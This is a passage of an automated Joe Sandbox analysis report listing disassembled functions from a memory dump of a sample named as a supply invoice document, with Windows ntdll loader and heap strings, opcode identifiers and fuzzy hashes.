                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                • Opcode ID: 83cf4a90498c77f09366b57aee52c3ffe51c8b362772de9f94df64235d53f489
                                                                                                                                • Instruction ID: 405f9a3eed8a2e6fd5ce2ad515a70e1575a7b7ed6d1beeac8ded358e18aa1874
                                                                                                                                • Opcode Fuzzy Hash: 83cf4a90498c77f09366b57aee52c3ffe51c8b362772de9f94df64235d53f489
                                                                                                                                • Instruction Fuzzy Hash: F1A19F759116299BDB32DF68CC88BAAFBB8EF44700F1041E9EA08A7251D7759EC4CF50
                                                                                                                                Function 01720BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpCheckModule, xrefs: 0176A117
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0176A121
                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0176A10F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-161242083
                                                                                                                                • Opcode ID: ca9be104a1bcefe14447a1ab21aa4b9e08af9c30c1a248ddd4027b80f3b903ae
                                                                                                                                • Instruction ID: 9ce375115e4361e83c347f7ff01ed60a140901598121c42f60c15f9a00ed0b4f
                                                                                                                                • Opcode Fuzzy Hash: ca9be104a1bcefe14447a1ab21aa4b9e08af9c30c1a248ddd4027b80f3b903ae
                                                                                                                                • Instruction Fuzzy Hash: 0071C1B0A00205DFDB29DF68C984ABEF7F4FB44714F14846DE912AB255E734A982CB60
                                                                                                                                Function 01710A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-1334570610
                                                                                                                                • Opcode ID: 7a44c140c55205d748e4e3868accf6c38bc6351f16731d51fcdc44af2a52a1e1
                                                                                                                                • Instruction ID: 6e9cb89640ca07e9a50ae8106ebdfcef3ee193483f27b9315d50c813d854c0bb
                                                                                                                                • Opcode Fuzzy Hash: 7a44c140c55205d748e4e3868accf6c38bc6351f16731d51fcdc44af2a52a1e1
                                                                                                                                • Instruction Fuzzy Hash: E561AD71600301DFDB29CF28C884B6AFBE5FF45708F14859DE84A8B29AD770E981CB91
                                                                                                                                Function 0173C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017782DE
                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 017782D7
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017782E8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-1783798831
                                                                                                                                • Opcode ID: cfef05f3b9953b901304d11a3be94fa1a2a4fb2ae9cf406736233788d19547c2
                                                                                                                                • Instruction ID: 4a029f270f28416f950b7d4648d844390306921eb8a395bcb934f2194fae3fe3
                                                                                                                                • Opcode Fuzzy Hash: cfef05f3b9953b901304d11a3be94fa1a2a4fb2ae9cf406736233788d19547c2
                                                                                                                                • Instruction Fuzzy Hash: FB41D471544301ABD722EB68DC49B5BF7E8EF84760F10892EFA45D7299EB70D800CB91
                                                                                                                                Function 017BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • @, xrefs: 017BC1F1
                                                                                                                                • PreferredUILanguages, xrefs: 017BC212
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017BC1C5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                • Opcode ID: 56fc2401ab1950279fa3b4f78be8354307bc8b8fc55abf37ea3806db522902fc
                                                                                                                                • Instruction ID: d6694379843f0eaec07ac3677361fba0e47dfae4ec7e778a0ddfa10118a2442b
                                                                                                                                • Opcode Fuzzy Hash: 56fc2401ab1950279fa3b4f78be8354307bc8b8fc55abf37ea3806db522902fc
                                                                                                                                • Instruction Fuzzy Hash: AE416371E04219EBEB12DBD8C885FEEFBB8AB18700F14816AE605F7244D7749A45CB50
                                                                                                                                Function 01794144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                • Opcode ID: 684aa7216ab72c14927b765d0e15283c6c05f7641d5e43734a24238af3f32d49
                                                                                                                                • Instruction ID: 815eb06b1589056d20fee3e1ae5f6d6279fa793dd7358762c142dbd5a1e932c3
                                                                                                                                • Opcode Fuzzy Hash: 684aa7216ab72c14927b765d0e15283c6c05f7641d5e43734a24238af3f32d49
                                                                                                                                • Instruction Fuzzy Hash: DA411472A442588BEF26DBD8EA48BADFBB5FF55340F140499D902EB785D7348906CB10
                                                                                                                                Function 01784755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpCheckRedirection, xrefs: 0178488F
                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01784888
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01784899
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-3154609507
                                                                                                                                • Opcode ID: 9abc34431b1425d00134a976f800fc15c31ae1f74f17e60b229d6cb8019cfcce
                                                                                                                                • Instruction ID: b64ae8b0617f85a8a203d0cbd0cf0640bd8d5d5250768ffc82317bc3ded3be47
                                                                                                                                • Opcode Fuzzy Hash: 9abc34431b1425d00134a976f800fc15c31ae1f74f17e60b229d6cb8019cfcce
                                                                                                                                • Instruction Fuzzy Hash: D541B232A942529FCB21EE59D840B26FBE5EF49650F06056DED4AD7215E7B0E800CB91
                                                                                                                                Function 01710BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-2558761708
                                                                                                                                • Opcode ID: b540bd6b597e29bd2446ac9deb9e89ef30575cf554844cc0645c09c018fa9769
                                                                                                                                • Instruction ID: e91c1bea9fd947b2df7754307dc5d85a711ab080b6e47fd401dada14c67e7847
                                                                                                                                • Opcode Fuzzy Hash: b540bd6b597e29bd2446ac9deb9e89ef30575cf554844cc0645c09c018fa9769
                                                                                                                                • Instruction Fuzzy Hash: B911E1313151029FDB29CA1CCC84B7AFBA9FF41659F18819DF806CB259DB34D884C754
                                                                                                                                Function 017820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpInitializationFailure, xrefs: 017820FA
                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017820F3
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01782104
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-2986994758
                                                                                                                                • Opcode ID: 04d0e93fd31dffec120e5a86d2ecf1c33352c77054cef8c812c171b60df950c2
                                                                                                                                • Instruction ID: f62c92c9ed9a966060d1c9cd3c36637baac583ba47cf36d9feef9c9532eb8231
                                                                                                                                • Opcode Fuzzy Hash: 04d0e93fd31dffec120e5a86d2ecf1c33352c77054cef8c812c171b60df950c2
                                                                                                                                • Instruction Fuzzy Hash: 2DF0C875B81308AFE724E64CCC5AF9A77ACEB40B64F21005DF60567685D6B0A544C651
                                                                                                                                Function 017103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: #%u
                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                • Opcode ID: 272352f45cf33d334917af5d80579bbecefe3f673c4e2ecd17d45a454e1a2c4e
                                                                                                                                • Instruction ID: 7aa0824954ada4e15e293ac44e7a2c44c644ad4e7652f77abea14ae6a549f392
                                                                                                                                • Opcode Fuzzy Hash: 272352f45cf33d334917af5d80579bbecefe3f673c4e2ecd17d45a454e1a2c4e
                                                                                                                                • Instruction Fuzzy Hash: 2C711771A0014A9FDB05DFA8C994FAEBBF8BF18704F144065E905E7259EB34ED45CBA0
                                                                                                                                Function 0170A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrResSearchResource Exit, xrefs: 0170AA25
                                                                                                                                • LdrResSearchResource Enter, xrefs: 0170AA13
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                • API String ID: 0-4066393604
                                                                                                                                • Opcode ID: cbb3ef65148bb43dd75560cf4cef7d8898783563a68e3aa70f5cedebecef4701
                                                                                                                                • Instruction ID: a725c5ee2c50b1a123f18ebbf317a5082fb39a5938926b987bcf65b11c20104e
                                                                                                                                • Opcode Fuzzy Hash: cbb3ef65148bb43dd75560cf4cef7d8898783563a68e3aa70f5cedebecef4701
                                                                                                                                • Instruction Fuzzy Hash: 68E16A71E00719EBEF22CA98C984BAEFBBABF58314F10446AED01E7291D7749941CB50
                                                                                                                                Function 017CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: `$`
                                                                                                                                • API String ID: 0-197956300
                                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                • Instruction ID: 11b5c460e031d5f26a15f5dff5a47e40c652d69c8a6d866940e07a5ce6d374dd
                                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                • Instruction Fuzzy Hash: 8BC1CE3120434A9BEB24CF28C844B6BFBE5BFD4B19F184A2CF6969B290E774D505CB41
                                                                                                                                Function 0177E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                • Opcode ID: b5d7cf83c9e105800405c3a5122e79b7fcf475c470e84f4566ef25d20ffbb2fd
                                                                                                                                • Instruction ID: 31de751846eff3d44de97b38d44f553f9162a53eef0fe5130519982305047020
                                                                                                                                • Opcode Fuzzy Hash: b5d7cf83c9e105800405c3a5122e79b7fcf475c470e84f4566ef25d20ffbb2fd
                                                                                                                                • Instruction Fuzzy Hash: E6612A71E407199FDB25DFA8C844BAEFBB9FB48704F1440ADE649EB291DB31A940CB50
                                                                                                                                Function 017A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$MUI
                                                                                                                                • API String ID: 0-17815947
                                                                                                                                • Opcode ID: 9abde963ae1670a8d85efa84472f8300b0433504f263874dc53db7f97875892c
                                                                                                                                • Instruction ID: 3a4ae9d2295796f895f508c57bf9eef6482ec7ae98e974641c9ad91d79b5881e
                                                                                                                                • Opcode Fuzzy Hash: 9abde963ae1670a8d85efa84472f8300b0433504f263874dc53db7f97875892c
                                                                                                                                • Instruction Fuzzy Hash: D15138B1E0021DAFDB11DFA9CC84AEEFBB8EB44754F540629E611B7280D7719A45CB60
                                                                                                                                Function 017004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0170063D
                                                                                                                                • kLsE, xrefs: 01700540
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                • Opcode ID: 0600fdee785176629d0612dc75cdb14013ac514346981f2d91adc5672c05a126
                                                                                                                                • Instruction ID: e3614d9ece0ad9981aa95c42dd53f3c173ed00d7aa9ae739dbf7a98d14c10d32
                                                                                                                                • Opcode Fuzzy Hash: 0600fdee785176629d0612dc75cdb14013ac514346981f2d91adc5672c05a126
                                                                                                                                • Instruction Fuzzy Hash: ED51BE71504742CFD726DF28C844BA7FBE5AF84360F20883EFA9A87281E7709545CB92
                                                                                                                                Function 0170A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0170A2FB
                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0170A309
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                • Opcode ID: 4cafa55950cf664699fb81513c1f47f5c3031dd53cf6fcc8cbd7a7d40a50e80a
                                                                                                                                • Instruction ID: f6b871142cc421954b8c0261b67b743496f696a7d75dd786cf3f38b8f68f646f
                                                                                                                                • Opcode Fuzzy Hash: 4cafa55950cf664699fb81513c1f47f5c3031dd53cf6fcc8cbd7a7d40a50e80a
                                                                                                                                • Instruction Fuzzy Hash: 7841AC30A04745DBDB16CF59C844BAAFBF8FF95700F2480A5E904DB2A6E6B5D940CB50
                                                                                                                                Function 017807C3 Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: NwB$NwB(
                                                                                                                                • API String ID: 0-1271276979
                                                                                                                                • Opcode ID: 02809f48ff5c5e56416546f128f9c71117dc70fe9f854c359580159fe4a2f594
                                                                                                                                • Instruction ID: b6969ebc66c7d3bb614e21034531750e05cb7a3612777405685a2112d0e8a926
                                                                                                                                • Opcode Fuzzy Hash: 02809f48ff5c5e56416546f128f9c71117dc70fe9f854c359580159fe4a2f594
                                                                                                                                • Instruction Fuzzy Hash: 5A419E715583019FD320EF29C845B9BFBE8FF88624F008A2EF998D7251D7709944CB92
                                                                                                                                Function 0173A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                • Opcode ID: f1cb17946a192ab7f549557e47ee1e7b8d0d4cfe8b9d7ecc4ebc8f873c1cb6a6
                                                                                                                                • Instruction ID: 03e6caa0b9c1c6f380c2494387971319d81b1f4f1b5f9c5c825f8bfffb7e87df
                                                                                                                                • Opcode Fuzzy Hash: f1cb17946a192ab7f549557e47ee1e7b8d0d4cfe8b9d7ecc4ebc8f873c1cb6a6
                                                                                                                                • Instruction Fuzzy Hash: 7E01DCB2644740EFD321DF24CD4AB26B7F8E784B26F018939B689CB595E334E804DB46
                                                                                                                                Function 0170C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: MUI
                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                • Opcode ID: 5f26933904d6b59a9137a01e2f5a4ab34202a5bf0fd72172f6532ea0b0cc3c0e
                                                                                                                                • Instruction ID: 357300c6cce7afb9c784b912e8ffe173b666eecf0205a9f60222a2903f527832
                                                                                                                                • Opcode Fuzzy Hash: 5f26933904d6b59a9137a01e2f5a4ab34202a5bf0fd72172f6532ea0b0cc3c0e
                                                                                                                                • Instruction Fuzzy Hash: AD823C75E00319DBEB26CFA9C8847EDFBF5BF48310F1481A9E919AB295D7309981CB50
                                                                                                                                Function 01786420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 2aa90f08ee112f414010cc6a6e91f583abb6af02401f20c8b1919fae26c28830
                                                                                                                                • Instruction ID: b2a36f1680e474cb6d85d0759a6238ec090a15224fba36d31260b7ff19784ada
                                                                                                                                • Opcode Fuzzy Hash: 2aa90f08ee112f414010cc6a6e91f583abb6af02401f20c8b1919fae26c28830
                                                                                                                                • Instruction Fuzzy Hash: 5C914171A40219BFEB21EF99CD85FAEFBB8EF18B50F104055F600AB195D775A904CBA0
                                                                                                                                Function 017AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 9fb8347cd16940d13a4cde7449abbf0d025d434af626bc84b0efe95f1a4878b0
                                                                                                                                • Instruction ID: 436b73ebc9bc6e23507afb1cd3c15267784035328e0d34d30d8aab878e14a42e
                                                                                                                                • Opcode Fuzzy Hash: 9fb8347cd16940d13a4cde7449abbf0d025d434af626bc84b0efe95f1a4878b0
                                                                                                                                • Instruction Fuzzy Hash: FB91AD32900609BFDB22AFA9DC48FAFFBB9EF85750F500129F501A7254EB359905CB91
                                                                                                                                Function 0173A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: GlobalTags
                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                • Opcode ID: a3c6a454dbc8662e73412d314a7d86625475f614b4d6e18eb362117691acc3e5
                                                                                                                                • Instruction ID: 88c4ddffea4d6157874645c623ae41bd021f4b1f422bb9656c31553ce39e29d8
                                                                                                                                • Opcode Fuzzy Hash: a3c6a454dbc8662e73412d314a7d86625475f614b4d6e18eb362117691acc3e5
                                                                                                                                • Instruction Fuzzy Hash: 8B716DB5E0061ACFEF28CF9DC590AADFBB1BF88750F14816EE505A7249E7319841CB90
                                                                                                                                Function 017A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .mui
                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                • Opcode ID: 00755e6553fb6f0403e5804d58a46e69ff3d229d51a29718c6cda87e234dff36
                                                                                                                                • Instruction ID: adadf60e08d9e34a31081271bc7182a99fa4f5f6f83e2ed187a0253ea5cddf89
                                                                                                                                • Opcode Fuzzy Hash: 00755e6553fb6f0403e5804d58a46e69ff3d229d51a29718c6cda87e234dff36
                                                                                                                                • Instruction Fuzzy Hash: 9951C572D0022ADBDF11DF9DC844AAEFBB4BF84610F494269E912BB244D7B59D01CBE4
                                                                                                                                Function 0171E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: EXT-
                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                • Opcode ID: 54ce265b73c0fe56b73c2b8d1d770f2d562b60354aa469a3fbfcd61d64c574ec
                                                                                                                                • Instruction ID: b12686ce4036f81cf50304bc932bd91e224494cd143558cd0825c4808603cb28
                                                                                                                                • Opcode Fuzzy Hash: 54ce265b73c0fe56b73c2b8d1d770f2d562b60354aa469a3fbfcd61d64c574ec
                                                                                                                                • Instruction Fuzzy Hash: B34193725083129BE712DB79C844B6BFBE8AF88714F44092DFA85E7188EB74D904C796
                                                                                                                                Function 0177C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
